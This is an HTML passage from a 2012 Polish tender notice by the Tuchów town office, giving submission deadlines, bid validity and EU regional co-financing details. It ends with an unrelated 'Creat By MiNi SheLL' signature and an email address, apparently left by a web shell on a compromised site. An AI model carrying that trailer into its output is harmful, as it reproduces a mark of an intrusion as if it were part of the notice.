<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie,33-170 Tuchów,ul.Jana Pawła II 4, pokój nr 24.Cena materiałów przetargowych wynosi 40,00 zł w wersji papierowej u Zamawiajacego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 10:00, miejsce: w  siedzibie Zamawiającego -Urząd Miejski w Tuchowie ul.Rynek 1  pokój  nr  1  parter./Dziennik podawczy/.Otwarcie w dniu 14.12.2012 o godz.10.30 -II piętro sala Konferencyjna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane jest z Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013   Działanie 4.3 Tworzenie i rozwój stref aktywności gospodarczej  
Schemat A Strefy aktywności gospodarczej o powierzchni 2-20 ha   
Umowa nr  : MRPO.04.03.01-12-013/11-00-XVI/84FE/11..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com